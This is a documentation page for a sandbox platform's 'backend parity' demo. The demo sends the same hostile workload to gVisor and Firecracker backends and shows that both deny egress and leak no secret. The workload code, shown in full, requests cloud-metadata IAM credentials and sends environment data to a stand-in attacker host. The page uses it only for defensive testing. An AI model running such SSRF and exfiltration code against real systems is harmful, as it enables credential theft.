Demo: backend parity

Same workload. Three kernels. One verdict.

One SessionBackend interface, three isolation technologies behind it. The same hostile request runs on Docker, gVisor, and Firecracker — and produces the same denied egress, no leaked secret, the same verdict shape. The guarantees live above the backend.

Overview

Source: demo/src/scenarios/backend-parity.ts — every claim and snippet on this page reflects that driver. It submits one hostile workload through the public SDK against each target control plane and asserts that every backend produces an identical security verdict.

Enclave's orchestrator, audit log, and egress policy are backend-agnostic (invariant 2). New behaviour goes through a single SessionBackend interface, so every isolation path inherits it. That makes the choice of isolation technology an operational decision — not a security one. You pick the kernel; the safety contract does not move.

The driver proves it the blunt way: take one hostile workload — code that SSRFs the cloud metadata IP 169.254.169.254 and exfiltrates to exfil.attacker.example — and run the exact same request against each backend. The verdict it asserts on every one: egress_denied for both targets and no secret returned (no eyJ… JWT in any public surface). There is no in-sandbox session credential at all (it was removed); the brokered secrets the control plane does hold — the git-clone token and the service-binding secrets — are injected at the boundary (init-container / egress proxy), never onto a public surface (invariant 1).

demo/src/scenarios/backend-parity.ts:L64–L87 · typescript
  `import os, json, urllib.request`,
  ``,
  `# 1. SSRF the cloud metadata IP for IAM credentials (the classic heist).`,
  `try:`,
  `    urllib.request.urlopen("http://${METADATA_IP}/latest/meta-data/iam/security-credentials/")`,
  `except Exception as e:`,
  `    print("metadata fetch blocked:", e)`,
  ``,
  `# 2. Exfiltrate anything we can find to an attacker-controlled host.`,
  `try:`,
  `    urllib.request.urlopen("http://${ATTACKER_HOST}/exfil?dump=" + ",".join(os.environ.keys()))`,
  `except Exception as e:`,
  `    print("exfil blocked:", e)`,
  ``,
  `enclave.result({"egressAttempted": True})`,
].join("\n");

/** A target control plane to run the workload against. */
interface Target {
  /** Display label (the isolation tech — docker / gvisor / firecracker / simulator-a). */
  label: string;
  baseUrl: string;
  apiKey?: string;
  /** Set when we booted it ourselves and must close it. */
captured · pnpm demo:backend-parity · exit 0 · 2/2 · gVisor + Firecracker
▣ Enclave — Same workload. Three kernels. One verdict.
backend parity (invariant 2): identical egress + secret-withholding verdict across isolation tech
mode: real:multi  ·  backends: gvisor, firecracker

┌──────────────────────────────────────────────┐
│ backend: gvisor
│ http://127.0.0.1:8090
├──────────────────────────────────────────────┤
│ ✓ egress_denied  169.254.169.254, exfil.attacker.example
│ ✓ no secret leaked  no eyJ JWT in any public surface
└──────────────────────────────────────────────┘

┌──────────────────────────────────────────────┐
│ backend: firecracker
│ http://127.0.0.1:8091
├──────────────────────────────────────────────┤
│ ✓ egress_denied  169.254.169.254, exfil.attacker.example
│ ✓ no secret leaked  no eyJ JWT in any public surface
└──────────────────────────────────────────────┘
The driver run: the identical hostile workload submitted to the gVisor/Kubernetes and Firecracker/KVM control planes, each returning the same denied egress, no leaked secret, the same verdict. Source: evidence/captures-real/backend-parity.log

Architecture

The picture below is the whole argument. The guarantees sit in one backend-agnostic core; the SessionBackend interface fans out to three concrete legs. Auth, tenancy, secret withholding, and egress policy are enforced above the fork, so each leg gets the same contract by construction.
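As a rough illustration of "enforced above the fork", the sketch below models a core that owns the egress decision and the audit log, with backends plugged in underneath. Every name and signature here (WorkloadRequest, AuditEvent, SessionBackend.run, Orchestrator, fakeBackend) is hypothetical: the real SessionBackend interface is not shown on this page, and the real backends enforce the boundary in the kernel or microVM rather than through a callback.

```typescript
// Hypothetical shapes for illustration; not the actual Enclave interfaces.
interface WorkloadRequest {
  code: string;
  language: string;
  egress: { allow: string[] };
}

interface AuditEvent {
  type: string;
  data?: { host?: string };
}

/** The only thing an isolation technology has to provide (assumed signature). */
interface SessionBackend {
  readonly label: string;
  /** Run the workload, consulting the core before each outbound connection. */
  run(req: WorkloadRequest, allowEgress: (host: string) => boolean): Promise<void>;
}

/** Backend-agnostic core: the egress decision and the audit events live here. */
class Orchestrator {
  readonly audit: AuditEvent[] = [];
  private readonly backend: SessionBackend;

  constructor(backend: SessionBackend) {
    this.backend = backend;
  }

  async submit(req: WorkloadRequest): Promise<AuditEvent[]> {
    this.audit.push({ type: "session_created" });
    // The policy check is defined once, above the backend fork.
    const allowEgress = (host: string): boolean => {
      const ok = req.egress.allow.includes(host);
      if (!ok) this.audit.push({ type: "egress_denied", data: { host } });
      return ok;
    };
    await this.backend.run(req, allowEgress);
    this.audit.push({ type: "workload_exited" });
    return this.audit;
  }
}

/** Stand-in backend that only replays a list of connection attempts. */
function fakeBackend(label: string, attempts: string[]): SessionBackend {
  return {
    label,
    async run(_req, allowEgress) {
      for (const host of attempts) allowEgress(host);
    },
  };
}
```

Because the stand-in backends contain no policy logic of their own, two orchestrators wrapping differently labelled backends produce the same audit sequence for the same request, which is the property the driver checks against real control planes.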

The driver does not select a backend per request. It picks the set of backends from the environment — one control plane URL per isolation tech — and runs the identical request against each. ENCLAVE_PARITY_BASE_URLS is a label=url,label=url list (optionally paired with ENCLAVE_PARITY_API_KEYS on the same labels):

demo/src/scenarios/backend-parity.ts:L142–L153 · typescript
    }));
    return { targets, mode: "real:multi" };
  }

  if (process.env.ENCLAVE_BASE_URL) {
    const label = process.env.ENCLAVE_BACKEND ?? "backend";
    return {
      targets: [
        {
          label,
          baseUrl: process.env.ENCLAVE_BASE_URL,
          apiKey: process.env.ENCLAVE_API_KEY ?? undefined,

Each target is then driven by the same runOnce: the request body — code, language, and egress — is byte-identical; only the baseUrl (and optional apiKey) of the EnclaveClient differs.
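The label=url,label=url format of ENCLAVE_PARITY_BASE_URLS, paired by label with ENCLAVE_PARITY_API_KEYS, could be parsed along the following lines. This is a minimal sketch, not the driver's code: parsePairs and parseParityTargets are hypothetical helpers, the environment is passed in as a plain object, and it assumes URLs and keys contain no commas.

```typescript
interface Target {
  label: string;
  baseUrl: string;
  apiKey?: string;
}

/** Parse "label=value,label=value" into a Map, skipping malformed entries. */
function parsePairs(list: string | undefined): Map<string, string> {
  const pairs = new Map<string, string>();
  for (const entry of (list ?? "").split(",")) {
    // Split on the first "=" only, so values may themselves contain "=".
    const eq = entry.indexOf("=");
    if (eq <= 0) continue; // no "=" at all, or an empty label
    const label = entry.slice(0, eq).trim();
    const value = entry.slice(eq + 1).trim();
    if (label && value) pairs.set(label, value);
  }
  return pairs;
}

/** Build one target per labelled URL, attaching the API key with the same label. */
function parseParityTargets(env: Record<string, string | undefined>): Target[] {
  const urls = parsePairs(env.ENCLAVE_PARITY_BASE_URLS);
  const keys = parsePairs(env.ENCLAVE_PARITY_API_KEYS);
  return Array.from(urls, ([label, baseUrl]) => ({
    label,
    baseUrl,
    apiKey: keys.get(label),
  }));
}
```

Under these assumptions, a value such as gvisor=http://127.0.0.1:8090,firecracker=http://127.0.0.1:8091 yields two targets in the order given, and a label without a matching key simply has no apiKey.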

demo/src/scenarios/backend-parity.ts:L191–L217 · typescript

  const denied = deniedHosts(audit);
  const leaked = JWT_RE.test(JSON.stringify({ session, audit, result: session.result }));

  const verdict: Verdict = {
    egressDenied: denied.includes(METADATA_IP) && denied.includes(ATTACKER_HOST),
    deniedHosts: denied,
    tokenWithheld: !leaked,
    phase: session.phase,
  };

  await enclave.teardown(handle.id).catch(() => {});
  return { verdict, session, audit };
}

/** Print one side-by-side tile for a backend. */
function printTile(t: Target, v: Verdict): void {
  const bar = "─".repeat(46);
  const egressLine = v.egressDenied
    ? `${C.green}✓ egress_denied${C.reset}  ${C.dim}${METADATA_IP}, ${ATTACKER_HOST}${C.reset}`
    : `${C.red}✗ egress NOT fully denied${C.reset}  ${C.dim}[${v.deniedHosts.join(", ") || "none"}]${C.reset}`;
  const tokenLine = v.tokenWithheld
    ? `${C.green}✓ no secret leaked${C.reset}  ${C.dim}no eyJ JWT in any public surface${C.reset}`
    : `${C.red}✗ SECRET LEAKED${C.reset}`;

  console.log(`${C.bold}${C.cyan}┌${bar}┐${C.reset}`);
  console.log(`${C.bold}${C.cyan}│${C.reset} ${C.bold}backend: ${t.label}${C.reset}`);

Note what does not appear: any backend-specific branching for security. There is no "if docker, also lock down egress"; the egress decision and the audit events are produced by the core, the same way, every time. This run drove two control planes, gVisor on Kubernetes and Firecracker on KVM, via ENCLAVE_PARITY_BASE_URLS; each leg executed the bytes and enforced the boundary in the kernel / microVM, and the two verdicts came back identical.

The verdict is identical

For each target, the driver distils the run into a structured Verdict: were both blocked hosts in the egress_denied audit events; was any JWT leaked into the session, audit, or result; and the terminal phase. It asserts each backend produces the safe verdict, then asserts the headline: every backend produced the same verdict shape (order-independent on the denied hosts).
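One way to make the "same verdict shape, order-independent on the denied hosts" comparison concrete is to reduce each Verdict to a canonical string and count the distinct strings. The Verdict fields below match the driver excerpt on this page; verdictKey and checkParity are hypothetical names, and including phase in the key is an assumption about what the driver treats as part of the shape.

```typescript
interface Verdict {
  egressDenied: boolean;
  deniedHosts: string[];
  tokenWithheld: boolean;
  phase: string;
}

/** Canonical key for a verdict; sorting makes the host order irrelevant. */
function verdictKey(v: Verdict): string {
  return JSON.stringify({
    egressDenied: v.egressDenied,
    deniedHosts: [...v.deniedHosts].sort(), // copy first, so the input is not mutated
    tokenWithheld: v.tokenWithheld,
    phase: v.phase,
  });
}

/** Parity holds when every backend collapses to exactly one key. */
function checkParity(verdicts: Verdict[]): { parity: boolean; distinctVerdictShapes: number } {
  const keys = new Set(verdicts.map(verdictKey));
  return { parity: keys.size === 1, distinctVerdictShapes: keys.size };
}
```

With this definition an empty list of verdicts is not treated as parity, since there is no shape to agree on.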

demo/src/scenarios/backend-parity.ts:L268–L289 · typescript
    fail(`backends disagreed — ${keys.size} distinct verdict shapes across ${records.length} backends`);
  }

  console.log(`${C.bold}${C.cyan}═══ verdict parity ═══${C.reset}`);
  if (parity) {
    console.log(
      `${C.bold}${C.green}✓ all ${records.length} backend(s) produced ONE identical verdict:${C.reset}`,
    );
    console.log(
      `  ${C.green}egress_denied${C.reset} [${METADATA_IP}, ${ATTACKER_HOST}]  ·  ${C.green}no secret leaked${C.reset}`,
    );
    console.log(
      `  ${C.dim}same orchestrator/audit/egress contract — only the kernel differs.${C.reset}`,
    );
  } else {
    console.log(`${C.bold}${C.red}✗ verdicts were not identical across backends.${C.reset}`);
  }
  console.log();

  console.log(
    failures === 0
      ? `${C.bold}${C.green}✓ backend parity proven across ${records.length} backend(s) — same hostile workload, same verdict.${C.reset}\n`

The verdict is built from public surfaces only — the egress_denied events carry the blocked data.host, and the JWT regex runs over { session, audit, result }. Same event types, same fields, same secret withholding — regardless of which kernel ran the bytes. The secret-withholding invariant (invariant 1) holds the same way on every backend; the kernel underneath is an implementation detail.
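The two inputs to the verdict can be sketched as follows. The deniedHosts name and the data.host field come from the page above; the body is a guess at a reasonable implementation, and the regular expression is an assumed pattern (three dot-separated base64url segments, the first starting with eyJ), since the driver's actual JWT_RE is not shown here. leaksJwt is a hypothetical wrapper.

```typescript
interface AuditEvent {
  type: string;
  data?: { host?: string };
}

// Assumed pattern, not the driver's: header.payload.signature in base64url,
// where an encoded JSON header conventionally begins with "eyJ".
const JWT_RE = /eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/;

/** Collect the distinct hosts named by egress_denied audit events. */
function deniedHosts(audit: AuditEvent[]): string[] {
  const hosts = new Set<string>();
  for (const e of audit) {
    if (e.type === "egress_denied" && e.data?.host) hosts.add(e.data.host);
  }
  return Array.from(hosts);
}

/** Serialize everything a caller can see and scan it for a JWT-shaped string. */
function leaksJwt(publicSurfaces: unknown): boolean {
  return JWT_RE.test(JSON.stringify(publicSurfaces));
}
```

Scanning the serialized object rather than individual fields means a token hidden in any nested property of the session, audit log, or result would still be caught.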

captured · evidence/captures-real/backend-parity-report.json · parity · 1 verdict shape
  "summary": {
    "mode": "real:multi",
    "passed": true,
    "failures": 0,
    "backendCount": 2,
    "parity": true,
    "distinctVerdictShapes": 1
  },
  "backends": [
    {
      "label": "gvisor",
      "baseUrl": "http://127.0.0.1:8090",
      "verdict": {
        "egressDenied": true,
        "deniedHosts": [
          "169.254.169.254",
          "exfil.attacker.example"
        ],
        "tokenWithheld": true,
        "phase": "succeeded"
      },
      "auditTypes": [
        "session_created",
        "sandbox_started",
        "egress_denied",
        "egress_denied",
        "result_collected",
        "workload_exited",
        "usage_metered"
      ]
    },
    {
      "label": "firecracker",
      "baseUrl": "http://127.0.0.1:8091",
      "verdict": {
        "egressDenied": true,
        "deniedHosts": [
          "169.254.169.254",
          "exfil.attacker.example"
        ],
        "tokenWithheld": true,
        "phase": "succeeded"
      },
      "auditTypes": [
        "session_created",
        "sandbox_started",
        "egress_denied",
        "egress_denied",
        "result_collected",
        "workload_exited",
        "usage_metered"
      ]
    }
  ]
The persisted evidence bundle: the gVisor/Kubernetes and Firecracker/KVM Verdicts and their audit event sequences are identical: same denied hosts, same withheld token, same audit types in the same order. Source: evidence/captures-real/backend-parity-report.json
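A consumer of the report, such as a CI step, might re-check it independently rather than trusting the summary alone. The sketch below uses only the fields visible in the excerpt above; the ParityReport and BackendRecord type names and the reportProblems helper are hypothetical, and the real file may carry additional fields.

```typescript
interface BackendRecord {
  label: string;
  baseUrl: string;
  verdict: { egressDenied: boolean; deniedHosts: string[]; tokenWithheld: boolean; phase: string };
  auditTypes: string[];
}

interface ParityReport {
  summary: {
    mode: string;
    passed: boolean;
    failures: number;
    backendCount: number;
    parity: boolean;
    distinctVerdictShapes: number;
  };
  backends: BackendRecord[];
}

/** Return a list of problems; an empty list means the report is self-consistent. */
function reportProblems(report: ParityReport): string[] {
  const problems: string[] = [];
  const { summary, backends } = report;
  if (!summary.passed || summary.failures !== 0) problems.push("summary reports failures");
  if (!summary.parity || summary.distinctVerdictShapes !== 1) problems.push("verdict shapes differ");
  if (summary.backendCount !== backends.length) problems.push("backendCount does not match backends");
  for (const b of backends) {
    if (!b.verdict.egressDenied || !b.verdict.tokenWithheld) problems.push(`${b.label} has an unsafe verdict`);
  }
  // Audit sequences are compared in order against the first backend.
  const [first, ...rest] = backends;
  for (const b of rest) {
    if (b.auditTypes.join(",") !== first.auditTypes.join(",")) {
      problems.push(`audit sequence of ${b.label} differs from ${first.label}`);
    }
  }
  return problems;
}
```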

When to use which

Parity does not mean the backends are interchangeable for security. They give the same contract at the control-plane layer, but the strength of the underlying isolation differs. Choose deliberately:

Docker

host kernel

Dev convenience — not a boundary.

Runs the workload in a local container on the host kernel. No gVisor, and it can't enforce allowlist egress. Use it for fast iteration on a laptop; never treat it as containment.

gVisor (runsc)

userspace kernel

Cloud security boundary, scaled on Kubernetes.

Each session is a gVisor Job: runsc intercepts syscalls, a per-session NetworkPolicy makes egress default-deny, and the service-binding egress proxy runs as a sidecar (shipped, proven by kubernetes-bindings.e2e). The default cloud path.

Firecracker

hardware microVM

Strongest isolation, on-prem / bare-metal.

A jailer-confined microVM with its own guest kernel over KVM hardware virtualization. Built and KVM-validated. Best when you control the host and want a hardware-virt boundary rather than a shared kernel.

Roadmap, not shipped: Kata + Firecracker on Kubernetes

Today, Firecracker runs as a standalone microVM backend (KVM host with /dev/kvm), and gVisor is the path that scales on Kubernetes. The intended convergence is Kata Containers backed by Firecracker — microVMs scheduled as pods on a cluster, giving hardware-virt isolation with k8s ergonomics. This is roadmap and is not yet shipped — do not plan around it. The shipped microVM path is the standalone Firecracker backend.

Run it

The driver follows a connect-or-boot rule. Set ENCLAVE_PARITY_BASE_URLS to a label=url list to drive one control plane per isolation tech (the real recording path); set a single ENCLAVE_BASE_URL to drive one labelled backend; set neither and it boots the in-process simulator and runs it twice to prove the verdict shape. In all three cases it writes evidence/backend-parity-report.{json,md} and exits non-zero on any failed assertion or verdict disagreement.
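The precedence of the connect-or-boot rule can be summarized in a few lines. This is a sketch only: planRun and the Plan type are hypothetical, the kind labels are placeholders rather than the driver's mode strings, and the environment is passed in as a plain object. The "backend" fallback label for the single-backend case matches the driver excerpt shown earlier on this page.

```typescript
type Plan =
  | { kind: "multi"; spec: string }
  | { kind: "single"; baseUrl: string; label: string }
  | { kind: "simulator"; runs: 2 };

/** Decide what to drive, checking the multi-backend list first. */
function planRun(env: Record<string, string | undefined>): Plan {
  if (env.ENCLAVE_PARITY_BASE_URLS) {
    // One control plane per isolation tech; the list still needs parsing.
    return { kind: "multi", spec: env.ENCLAVE_PARITY_BASE_URLS };
  }
  if (env.ENCLAVE_BASE_URL) {
    return {
      kind: "single",
      baseUrl: env.ENCLAVE_BASE_URL,
      label: env.ENCLAVE_BACKEND ?? "backend",
    };
  }
  // Nothing to connect to: boot the in-process simulator and run it twice.
  return { kind: "simulator", runs: 2 };
}
```

Checking the list variable first means that setting both variables selects the multi-backend path.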

demo/package.json:L13–L13 · json
    "demo:backend-parity": "tsx src/scenarios/backend-parity.ts",
captured · pnpm demo:backend-parity · 2/2 backends · parity
═══ verdict parity ═══
✓ all 2 backend(s) produced ONE identical verdict:
  egress_denied [169.254.169.254, exfil.attacker.example]  ·  no secret leaked
  same orchestrator/audit/egress contract — only the kernel differs.

✓ backend parity proven across 2 backend(s) — same hostile workload, same verdict.
The headline assertion: the gVisor/Kubernetes and Firecracker/KVM runs produced one identical verdict. The driver exits non-zero on any per-backend failure or any verdict disagreement, so it doubles as a regression gate. Source: evidence/captures-real/backend-parity.log